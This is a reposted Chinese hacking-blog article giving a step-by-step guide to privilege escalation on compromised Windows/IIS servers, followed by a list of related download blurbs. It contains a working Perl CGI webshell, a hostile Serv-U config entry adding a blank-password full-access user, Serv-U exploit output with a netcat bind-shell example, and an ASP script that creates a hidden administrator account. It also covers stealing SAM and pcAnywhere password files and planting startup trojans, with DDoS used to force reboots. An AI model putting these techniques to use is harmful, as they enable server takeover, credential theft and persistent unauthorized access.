//文章不错,我看了后觉得对于系统管理员来讲能够更好的防范这种渗透攻击,提升系统安全性能
转自http://blog.hackbase.com/cat
提升权限终极技巧
作者:黑狼
个人总结如下:
1: C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/
看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆
ps: 破解工具本站已提供。请自己Search一下!
2.C:/WINNT/system32/config/
进这里下它的SAM,破解用户的密码
用到破解sam密码的软件有LC,SAMinside
3.C:/Documents and Settings/All Users/「开始」菜单/程序/
看这里能跳转不,我们从这里可以获取好多有用的信息
可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转
进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空
[USER=WekweN|1]
Password=
HomeDir=c:/
TimeOut=600
Maintenance=System
Access1=C:/|RWAMELCDP
Access1=d:/|RWAMELCDP
Access1=f:/|RWAMELCDP
SKEYValues=
这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限
4.c:/winnt/system32/inetsrv/data/
就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行
5.看能否跳转到如下目录
c:/php, 用phpspy
c:/prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html/r/n/r/n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%<chmetcnv w:st="on" unitname="F" sourcevalue="2" hasspace="False" negative="False" numbertype="1" tcsc="0">2f</chmetcnv>////ig;
$execthis = $_;
syswrite(STDOUT, "<HTML><PRE>/r/n", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "/r/n</PRE></HTML>/r/n", 17);
close(STDERR);
close(STDOUT);
exit;
保存为cgi执行,
如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交 _blank>http://anyhost//cmd.pl?dir
显示"拒绝访问",表示可以执行了!马上提交:先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录
_blank>http://anyhost//cmd.pl?c/perl/bin/su.exe
返回:
Serv-u >3.x Local Exploit by xiaolu
USAGE: serv-u.exe "command"
Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
现在是 IUSR 权限,提交:
_blank>http://anyhost//cmd.pl?c/perl/bin/su.exe "cacls.ex ... /G everyone:F"
_blank>http://anyhost//cmd.pl?c/perl/bin/su.exe "cacls.ex ... /G everyone:F"
_blank>http://anyhost//cmd.pl?c/perl/bin/su.exe "cacls.ex ... /G everyone:F"
_blank>http://anyhost//cmd.pl?c/perl/bin/su.exe "cacls.ex ... /G everyone:F"
如果返回下面的信息,就表示成功了
Serv-u >3.x Local Exploit by xiaolu
<220 Serv-U FTP Server v5.2 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
<200-DomainID=2
<220 Domain settings saved
******************************************************
[+] Domain xl:2 created
[+] Creating Evil User
<200-User=xl
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER xl
<331 User name okay, need password.
******************************************************
>PASS 111111
<230 User logged in, proceed.
******************************************************
[+] Now Executing: cacls.exe c: /E /T /G everyone:F
<220 Domain deleted
这样所有分区为everyone完全控制
现在我们把自己的用户提升为管理员:
_blank>http://anyhost//cmd.pl?c/perl/bin/su.exe " net l ... s IUSR_anyhost /add"
6.可以成功运行"cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
用这个cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:/winnt/system32/inetsrv/asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:/WINNT/system32/idq.dll" "C:/WINNT/system32/inetsrv/httpext.dll" "C:/WINNT/system32/inetsrv/httpodbc.dll" "C:/WINNT/system32/inetsrv/ssinc.dll" "C:/WINNT/system32/msw3prt.dll""c:/winnt/system32/inetsrv/asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了
7.还可以用这段代码试提升,好象效果不明显
<%@codepage=936%><%Response.Expires=0
on error resume next
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user","an85$")
od.SetPassword "an85" <-----密码
od.SetInfo
Set of=GetObject(oz&"/an85$,user")
oe.Add(of.ADsPath)
Response.write "一个超级帐号建立成功!"%>
用这段代码检查是否提升成功
<%@codepage=936%>
<%Response.Expires=0
on error resume next '查找Administrators组帐号
Set tN=server.createObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
For Each admin in objGroup.Members
Response.write admin.Name&"<br>"
Next
if err then
Response.write "不行啊:Wscript.Network"
end if
%>
8.C:/Program Files/Java Web Start/
这里如果可以,一般很小,可以尝试用jsp的webshell,听说权限很小,本人没有遇见过。
9.最后了,如果主机设置很变态,可以试下在c:/Documents and Settings/All Users/「开始」菜单/程序/启动"写入bat,vbs等木马。
等到主机重启或者你ddos逼它重启,来达到权限提升的目的。
总结起来说就是,找到有执行和写入的目录,管他什么目录,然后上传提升工具,最后执行,三个字"找" "上""执"
以上是本人的拙见,大家有什么好的方法多多分享
分享到:
相关推荐
WEBSHELL权限提升技巧.7zWEBSHELL权限提升技巧.7zWEBSHELL权限提升技巧.7zWEBSHELL权限提升技巧.7z
利用windows的漏洞提升windows的权限
C#调用Windows API获取和修改本地/系统时间,C#提升进程修改时间权限
易语言模块提升权限.rar
在win7下有时候需要提升权限才能执行成功,例如:createprocess,只有在有权限的时候,才可以执行成功。 mt.exe -manifest程序.exe.manifest -outputresource:..\..\目录\程序.exe;1 copy "..\..\目录\程序.exe" "....
windows权限设置器 windows权限设置器
windows下权限设置详解windows下权限设置详解windows下权限设置详解windows下权限设置详解
易语言简单提升自身权限模块源码例程程序调用API函数RtlAdjustPrivilege提升自身的进程权限。本易语言源码例程属于易语言进阶教程。本源码是提升权限API的例程,遗憾的是没有比较详细的说明。资源作者:。资源下载:...
假设我们要将Windows Server (服务器名:machine 1)上的test1共享目录的共享权限复制到Windows Server (服务器名:machine 2)上的共享目录test2上,用的命令应该是这样的: Permcopy //machine1 test1 //machine2 ...
C#提升进程或程序权限,使得进程拥有更高的权限(Windows提供了35中权限),如管理员具有的相关权限,甚至可以拥有管理员所不具备的权限。
易语言提升管理员权限源码。@资源源码站。
C#创建windows用户并分配其权限.txtC#创建windows用户并分配其权限.txtC#创建windows用户并分配其权限.txtC#创建windows用户并分配其权限.txtC#创建windows用户并分配其权限.txtC#创建windows用户并分配其权限.txt
易语言源码提升权限.7z
windows当前用户权限判断 windows当前用户权限判断 windows当前用户权限判断 windows当前用户权限判断 windows当前用户权限判断
为什么要提升操作注册表的特权限? 要对一个任意进程(包括系统安全进程和服务进程)进行指定了写相关的访问权的OpenProcess操作,只要当前进程具有SeDeDebug权限就 可以了。要是一个用户是Administrator或是被给予...
获取Windows 7下System至高无上的权限
提升权限模块.rar
该文档主要内容是使应用程序提升权限,获得关闭操作系统,重启操作系统等的权限
windows 用户权限管理工具,NSudoLG-用户权限提升工具